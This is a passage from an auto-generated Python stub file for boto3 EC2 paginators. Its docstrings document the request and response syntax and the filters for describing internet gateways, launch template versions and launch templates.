* ``network-interface.addresses.private-ip-address`` - The private IPv4 address associated with the network interface.
* ``network-interface.addresses.primary`` - Specifies whether the IPv4 address of the network interface is the primary private IPv4 address.
* ``network-interface.addresses.association.public-ip`` - The ID of the association of an Elastic IP address (IPv4) with a network interface.
* ``network-interface.addresses.association.ip-owner-id`` - The owner ID of the private IPv4 address associated with the network interface.
* ``network-interface.association.public-ip`` - The address of the Elastic IP address (IPv4) bound to the network interface.
* ``network-interface.association.ip-owner-id`` - The owner of the Elastic IP address (IPv4) associated with the network interface.
* ``network-interface.association.allocation-id`` - The allocation ID returned when you allocated the Elastic IP address (IPv4) for your network interface.
* ``network-interface.association.association-id`` - The association ID returned when the network interface was associated with an IPv4 address.
* ``network-interface.attachment.attachment-id`` - The ID of the interface attachment.
* ``network-interface.attachment.instance-id`` - The ID of the instance to which the network interface is attached.
* ``network-interface.attachment.instance-owner-id`` - The owner ID of the instance to which the network interface is attached.
* ``network-interface.attachment.device-index`` - The device index to which the network interface is attached.
* ``network-interface.attachment.status`` - The status of the attachment (``attaching`` | ``attached`` | ``detaching`` | ``detached`` ).
* ``network-interface.attachment.attach-time`` - The time that the network interface was attached to an instance.
* ``network-interface.attachment.delete-on-termination`` - Specifies whether the attachment is deleted when an instance is terminated.
* ``network-interface.availability-zone`` - The Availability Zone for the network interface.
* ``network-interface.description`` - The description of the network interface.
* ``network-interface.group-id`` - The ID of a security group associated with the network interface.
* ``network-interface.group-name`` - The name of a security group associated with the network interface.
* ``network-interface.ipv6-addresses.ipv6-address`` - The IPv6 address associated with the network interface.
* ``network-interface.mac-address`` - The MAC address of the network interface.
* ``network-interface.network-interface-id`` - The ID of the network interface.
* ``network-interface.owner-id`` - The ID of the owner of the network interface.
* ``network-interface.private-dns-name`` - The private DNS name of the network interface.
* ``network-interface.requester-id`` - The requester ID for the network interface.
* ``network-interface.requester-managed`` - Indicates whether the network interface is being managed by AWS.
* ``network-interface.status`` - The status of the network interface (``available`` | ``in-use`` ).
* ``network-interface.source-dest-check`` - Whether the network interface performs source/destination checking. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the network interface to perform network address translation (NAT) in your VPC.
* ``network-interface.subnet-id`` - The ID of the subnet for the network interface.
* ``network-interface.vpc-id`` - The ID of the VPC for the network interface.
* ``owner-id`` - The AWS account ID of the instance owner.
* ``placement-group-name`` - The name of the placement group for the instance.
* ``placement-partition-number`` - The partition in which the instance is located.
* ``platform`` - The platform. To list only Windows instances, use ``windows`` .
* ``private-dns-name`` - The private IPv4 DNS name of the instance.
* ``private-ip-address`` - The private IPv4 address of the instance.
* ``product-code`` - The product code associated with the AMI used to launch the instance.
* ``product-code.type`` - The type of product code (``devpay`` | ``marketplace`` ).
* ``ramdisk-id`` - The RAM disk ID.
* ``reason`` - The reason for the current state of the instance (for example, shows \"User Initiated [date]\" when you stop or terminate the instance). Similar to the state-reason-code filter.
* ``requester-id`` - The ID of the entity that launched the instance on your behalf (for example, AWS Management Console, Auto Scaling, and so on).
* ``reservation-id`` - The ID of the instance\'s reservation. A reservation ID is created any time you launch an instance. A reservation ID has a one-to-one relationship with an instance launch request, but can be associated with more than one instance if you launch multiple instances using the same launch request. For example, if you launch one instance, you get one reservation ID. If you launch ten instances using the same launch request, you also get one reservation ID.
* ``root-device-name`` - The device name of the root device volume (for example, ``/dev/sda1`` ).
* ``root-device-type`` - The type of the root device volume (``ebs`` | ``instance-store`` ).
* ``source-dest-check`` - Indicates whether the instance performs source/destination checking. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the instance to perform network address translation (NAT) in your VPC.
* ``spot-instance-request-id`` - The ID of the Spot Instance request.
* ``state-reason-code`` - The reason code for the state change.
* ``state-reason-message`` - A message that describes the state change.
* ``subnet-id`` - The ID of the subnet for the instance.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources that have a tag with a specific key, regardless of the tag value.
* ``tenancy`` - The tenancy of an instance (``dedicated`` | ``default`` | ``host`` ).
* ``virtualization-type`` - The virtualization type of the instance (``paravirtual`` | ``hvm`` ).
* ``vpc-id`` - The ID of the VPC that the instance is running in.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type InstanceIds: list
:param InstanceIds:
The instance IDs.
Default: Describes all your instances.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeInternetGateways(Paginator):
    # Auto-generated paginator stub: the docstring below documents the request and
    # response shapes for EC2.Client.describe_internet_gateways; the actual paging
    # behavior is supplied by the botocore Paginator base class at runtime.
    def paginate(self, Filters: List = None, DryRun: bool = None, InternetGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_internet_gateways`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInternetGateways>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              InternetGatewayIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
          {
              'InternetGateways': [
                  {
                      'Attachments': [
                          {
                              'State': 'attaching'|'attached'|'detaching'|'detached',
                              'VpcId': 'string'
                          },
                      ],
                      'InternetGatewayId': 'string',
                      'OwnerId': 'string',
                      'Tags': [
                          {
                              'Key': 'string',
                              'Value': 'string'
                          },
                      ]
                  },
              ],
          }
        **Response Structure**
        - *(dict) --*
          - **InternetGateways** *(list) --*
            Information about one or more internet gateways.
            - *(dict) --*
              Describes an internet gateway.
              - **Attachments** *(list) --*
                Any VPCs attached to the internet gateway.
                - *(dict) --*
                  Describes the attachment of a VPC to an internet gateway or an egress-only internet gateway.
                  - **State** *(string) --*
                    The current state of the attachment. For an internet gateway, the state is ``available`` when attached to a VPC; otherwise, this value is not returned.
                  - **VpcId** *(string) --*
                    The ID of the VPC.
              - **InternetGatewayId** *(string) --*
                The ID of the internet gateway.
              - **OwnerId** *(string) --*
                The ID of the AWS account that owns the internet gateway.
              - **Tags** *(list) --*
                Any tags assigned to the internet gateway.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type Filters: list
        :param Filters:
          One or more filters.
          * ``attachment.state`` - The current state of the attachment between the gateway and the VPC (``available`` ). Present only if a VPC is attached.
          * ``attachment.vpc-id`` - The ID of an attached VPC.
          * ``internet-gateway-id`` - The ID of the Internet gateway.
          * ``owner-id`` - The ID of the AWS account that owns the internet gateway.
          * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
          * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type InternetGatewayIds: list
        :param InternetGatewayIds:
          One or more internet gateway IDs.
          Default: Describes all your internet gateways.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        # Stub body only: this file exists for IDE/static documentation purposes.
        pass
class DescribeLaunchTemplateVersions(Paginator):
def paginate(self, DryRun: bool = None, LaunchTemplateId: str = None, LaunchTemplateName: str = None, Versions: List = None, MinVersion: str = None, MaxVersion: str = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_launch_template_versions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeLaunchTemplateVersions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
LaunchTemplateId='string',
LaunchTemplateName='string',
Versions=[
'string',
],
MinVersion='string',
MaxVersion='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'LaunchTemplateVersions': [
{
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'VersionNumber': 123,
'VersionDescription': 'string',
'CreateTime': datetime(2015, 1, 1),
'CreatedBy': 'string',
'DefaultVersion': True|False,
'LaunchTemplateData': {
'KernelId': 'string',
'EbsOptimized': True|False,
'IamInstanceProfile': {
'Arn': 'string',
'Name': 'string'
},
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'VirtualName': 'string',
'Ebs': {
'Encrypted': True|False,
'DeleteOnTermination': True|False,
'Iops': 123,
'KmsKeyId': 'string',
'SnapshotId': 'string',
'VolumeSize': 123,
'VolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1'
},
'NoDevice': 'string'
},
],
'NetworkInterfaces': [
{
'AssociatePublicIpAddress': True|False,
'DeleteOnTermination': True|False,
'Description': 'string',
'DeviceIndex': 123,
'Groups': [
'string',
],
'InterfaceType': 'string',
'Ipv6AddressCount': 123,
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'NetworkInterfaceId': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Primary': True|False,
'PrivateIpAddress': 'string'
},
],
'SecondaryPrivateIpAddressCount': 123,
'SubnetId': 'string'
},
],
'ImageId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.l
arge'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KeyName': 'string',
'Monitoring': {
'Enabled': True|False
},
'Placement': {
'AvailabilityZone': 'string',
'Affinity': 'string',
'GroupName': 'string',
'HostId': 'string',
'Tenancy': 'default'|'dedicated'|'host',
'SpreadDomain': 'string'
},
'RamDiskId': 'string',
'DisableApiTermination': True|False,
'InstanceInitiatedShutdownBehavior': 'stop'|'terminate',
'UserData': 'string',
'TagSpecifications': [
{
'ResourceType': 'client-vpn-endpoint'|'customer-gateway'|'dedicated-host'|'dhcp-options'|'elastic-ip'|'fleet'|'fpga-image'|'host-reservation'|'image'|'instance'|'internet-gateway'|'launch-template'|'natgateway'|'network-acl'|'network-interface'|'reserved-instances'|'route-table'|'security-group'|'snapshot'|'spot-instances-request'|'subnet'|'transit-gateway'|'transit-gateway-attachment'|'transit-gateway-route-table'|'volume'|'vpc'|'vpc-peering-connection'|'vpn-connection'|'vpn-gateway',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
'ElasticGpuSpecifications': [
{
'Type': 'string'
},
],
'ElasticInferenceAccelerators': [
{
'Type': 'string'
},
],
'SecurityGroupIds': [
'string',
],
'SecurityGroups': [
'string',
],
'InstanceMarketOptions': {
'MarketType': 'spot',
'SpotOptions': {
'MaxPrice': 'string',
'SpotInstanceType': 'one-time'|'persistent',
'BlockDurationMinutes': 123,
'ValidUntil': datetime(2015, 1, 1),
'InstanceInterruptionBehavior': 'hibernate'|'stop'|'terminate'
}
},
'CreditSpecification': {
'CpuCredits': 'string'
},
'CpuOptions': {
'CoreCount': 123,
'ThreadsPerCore': 123
},
'CapacityReservationSpecification': {
'CapacityReservationPreference': 'open'|'none',
'CapacityReservationTarget': {
'CapacityReservationId': 'string'
}
},
'LicenseSpecifications': [
{
'LicenseConfigurationArn': 'string'
},
],
'HibernationOptions': {
'Configured': True|False
}
}
},
],
}
**Response Structure**
- *(dict) --*
- **LaunchTemplateVersions** *(list) --*
Information about the launch template versions.
- *(dict) --*
Describes a launch template version.
- **LaunchTemplateId** *(string) --*
The ID of the launch template.
- **LaunchTemplateName** *(string) --*
The name of the launch template.
- **VersionNumber** *(integer) --*
The version number.
- **VersionDescription** *(string) --*
The description for the version.
- **CreateTime** *(datetime) --*
The time the version was created.
- **CreatedBy** *(string) --*
The principal that created the version.
- **DefaultVersion** *(boolean) --*
Indicates whether the version is the default version.
- **LaunchTemplateData** *(dict) --*
Information about the launch template.
- **KernelId** *(string) --*
The ID of the kernel, if applicable.
- **EbsOptimized** *(boolean) --*
Indicates whether the instance is optimized for Amazon EBS I/O.
- **IamInstanceProfile** *(dict) --*
The IAM instance profile.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Name** *(string) --*
The name of the instance profile.
- **BlockDeviceMappings** *(list) --*
The block device mappings.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name.
- **VirtualName** *(string) --*
The virtual device name (ephemeralN).
- **Ebs** *(dict) --*
Information about the block device for an EBS volume.
- **Encrypted** *(boolean) --*
Indicates whether the EBS volume is encrypted.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the EBS volume is deleted on instance termination.
- **Iops** *(integer) --*
The number of I/O operations per second (IOPS) that the volume supports.
- **KmsKeyId** *(string) --*
The ARN of the AWS Key Management Service (AWS KMS) CMK used for encryption.
- **SnapshotId** *(string) --*
The ID of the snapshot.
- **VolumeSize** *(integer) --*
The size of the volume, in GiB.
- **VolumeType** *(string) --*
The volume type.
- **NoDevice** *(string) --*
Suppresses the specified device included in the block device mapping of the AMI.
- **NetworkInterfaces** *(list) --*
The network interfaces.
- *(dict) --*
Describes a network interface.
- **AssociatePublicIpAddress** *(boolean) --*
Indicates whether to associate a public IPv4 address with eth0 for a new network interface.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the network interface is deleted when the instance is terminated.
- **Description** *(string) --*
A description for the network interface.
- **DeviceIndex** *(integer) --*
The device index for the network interface attachment.
- **Groups** *(list) --*
The IDs of one or more security groups.
- *(string) --*
- **InterfaceType** *(string) --*
The type of network interface.
- **Ipv6AddressCount** *(integer) --*
The number of IPv6 addresses for the network interface.
- **Ipv6Addresses** *(list) --*
The IPv6 addresses for the network interface.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **PrivateIpAddress** *(string) --*
The primary private IPv4 address of the network interface.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses.
- *(dict) --*
Describes a secondary private IPv4 address for a network interface.
- **Primary** *(boolean) --*
Indicates whether the private IPv4 address is the primary private IPv4 address. Only one IPv4 address can be designated as primary.
- **PrivateIpAddress** *(string) --*
The private IPv4 addresses.
- **SecondaryPrivateIpAddressCount** *(integer) --*
The number of secondary private IPv4 addresses for the network interface.
- **SubnetId** *(string) --*
The ID of the subnet for the network interface.
- **ImageId** *(string) --*
The ID of the AMI that was used to launch the instance.
- **InstanceType** *(string) --*
The instance type.
- **KeyName** *(string) --*
The name of the key pair.
- **Monitoring** *(dict) --*
The monitoring for the instance.
- **Enabled** *(boolean) --*
Indicates whether detailed monitoring is enabled. Otherwise, basic monitoring is enabled.
- **Placement** *(dict) --*
The placement of the instance.
- **AvailabilityZone** *(string) --*
The Availability Zone of the instance.
- **Affinity** *(string) --*
The affinity setting for the instance on the Dedicated Host.
- **GroupName** *(string) --*
The name of the placement group for the instance.
- **HostId** *(string) --*
The ID of the Dedicated Host for the instance.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware.
- **SpreadDomain** *(string) --*
Reserved for future use.
- **RamDiskId** *(string) --*
The ID of the RAM disk, if applicable.
- **DisableApiTermination** *(boolean) --*
If set to ``true`` , indicates that the instance cannot be terminated using the Amazon EC2 console, command line tool, or API.
- **InstanceInitiatedShutdownBehavior** *(string) --*
Indicates whether an instance stops or terminates when you initiate shutdown from the instance (using the operating system command for system shutdown).
- **UserData** *(string) --*
The user data for the instance.
- **TagSpecifications** *(list) --*
The tags.
- *(dict) --*
The tag specification for the launch template.
- **ResourceType** *(string) --*
The type of resource.
- **Tags** *(list) --*
The tags for the resource.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **ElasticGpuSpecifications** *(list) --*
The elastic GPU specification.
- *(dict) --*
Describes an elastic GPU.
- **Type** *(string) --*
The elastic GPU type.
- **ElasticInferenceAccelerators** *(list) --*
The elastic inference accelerator for the instance.
- *(dict) --*
Describes an elastic inference accelerator.
- **Type** *(string) --*
The type of elastic inference accelerator. The possible values are eia1.medium, eia1.large, and eia1.xlarge.
- **SecurityGroupIds** *(list) --*
The security group IDs.
- *(string) --*
- **SecurityGroups** *(list) --*
The security group names.
- *(string) --*
- **InstanceMarketOptions** *(dict) --*
The market (purchasing) option for the instances.
- **MarketType** *(string) --*
The market type.
- **SpotOptions** *(dict) --*
The options for Spot Instances.
- **MaxPrice** *(string) --*
The maximum hourly price you're willing to pay for the Spot Instances.
- **SpotInstanceType** *(string) --*
The Spot Instance request type.
- **BlockDurationMinutes** *(integer) --*
The required duration for the Spot Instances (also known as Spot blocks), in minutes. This value must be a multiple of 60 (60, 120, 180, 240, 300, or 360).
- **ValidUntil** *(datetime) --*
The end date of the request. For a one-time request, the request remains active until all instances launch, the request is canceled, or this date is reached. If the request is persistent, it remains active until it is canceled or this date and time is reached.
- **InstanceInterruptionBehavior** *(string) --*
The behavior when a Spot Instance is interrupted.
- **CreditSpecification** *(dict) --*
The credit option for CPU usage of the instance.
- **CpuCredits** *(string) --*
The credit option for CPU usage of a T2 or T3 instance. Valid values are ``standard`` and ``unlimited`` .
- **CpuOptions** *(dict) --*
The CPU options for the instance. For more information, see `Optimizing CPU Options <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-optimize-cpu.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
- **CoreCount** *(integer) --*
The number of CPU cores for the instance.
- **ThreadsPerCore** *(integer) --*
The number of threads per CPU core.
- **CapacityReservationSpecification** *(dict) --*
Information about the Capacity Reservation targeting option.
- **CapacityReservationPreference** *(string) --*
Indicates the instance's Capacity Reservation preferences. Possible preferences include:
* ``open`` - The instance can run in any ``open`` Capacity Reservation that has matching attributes (instance type, platform, Availability Zone).
* ``none`` - The instance avoids running in a Capacity Reservation even if one is available. The instance runs in On-Demand capacity.
- **CapacityReservationTarget** *(dict) --*
Information about the target Capacity Reservation.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **LicenseSpecifications** *(list) --*
The license configurations.
- *(dict) --*
Describes a license configuration.
- **LicenseConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) of the license configuration.
- **HibernationOptions** *(dict) --*
Indicates whether an instance is configured for hibernation. For more information, see `Hibernate Your Instance <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Hibernate.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
- **Configured** *(boolean) --*
If this parameter is set to ``true`` , the instance is enabled for hibernation; otherwise, it is not enabled for hibernation.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type LaunchTemplateId: string
:param LaunchTemplateId:
The ID of the launch template. You must specify either the launch template ID or launch template name in the request.
:type LaunchTemplateName: string
:param LaunchTemplateName:
The name of the launch template. You must specify either the launch template ID or launch template name in the request.
:type Versions: list
:param Versions:
One or more versions of the launch template.
- *(string) --*
:type MinVersion: string
:param MinVersion:
The version number after which to describe launch template versions.
:type MaxVersion: string
:param MaxVersion:
The version number up to which to describe launch template versions.
:type Filters: list
:param Filters:
One or more filters.
* ``create-time`` - The time the launch template version was created.
* ``ebs-optimized`` - A boolean that indicates whether the instance is optimized for Amazon EBS I/O.
* ``iam-instance-profile`` - The ARN of the IAM instance profile.
* ``image-id`` - The ID of the AMI.
* ``instance-type`` - The instance type.
* ``is-default-version`` - A boolean that indicates whether the launch template version is the default version.
* ``kernel-id`` - The kernel ID.
* ``ram-disk-id`` - The RAM disk ID.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeLaunchTemplates(Paginator):
    # Documentation/typing stub: ``paginate`` carries the full AWS
    # request/response reference for DescribeLaunchTemplates and a ``pass``
    # body — presumably the real pagination logic is supplied dynamically
    # by botocore at runtime (TODO confirm against the generator).
    def paginate(self, DryRun: bool = None, LaunchTemplateIds: List = None, LaunchTemplateNames: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_launch_templates`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeLaunchTemplates>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              LaunchTemplateIds=[
                  'string',
              ],
              LaunchTemplateNames=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
          {
              'LaunchTemplates': [
                  {
                      'LaunchTemplateId': 'string',
                      'LaunchTemplateName': 'string',
                      'CreateTime': datetime(2015, 1, 1),
                      'CreatedBy': 'string',
                      'DefaultVersionNumber': 123,
                      'LatestVersionNumber': 123,
                      'Tags': [
                          {
                              'Key': 'string',
                              'Value': 'string'
                          },
                      ]
                  },
              ],
          }
        **Response Structure**
        - *(dict) --*
          - **LaunchTemplates** *(list) --*
            Information about the launch templates.
            - *(dict) --*
              Describes a launch template.
              - **LaunchTemplateId** *(string) --*
                The ID of the launch template.
              - **LaunchTemplateName** *(string) --*
                The name of the launch template.
              - **CreateTime** *(datetime) --*
                The time the launch template was created.
              - **CreatedBy** *(string) --*
                The principal that created the launch template.
              - **DefaultVersionNumber** *(integer) --*
                The version number of the default version of the launch template.
              - **LatestVersionNumber** *(integer) --*
                The version number of the latest version of the launch template.
              - **Tags** *(list) --*
                The tags for the launch template.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
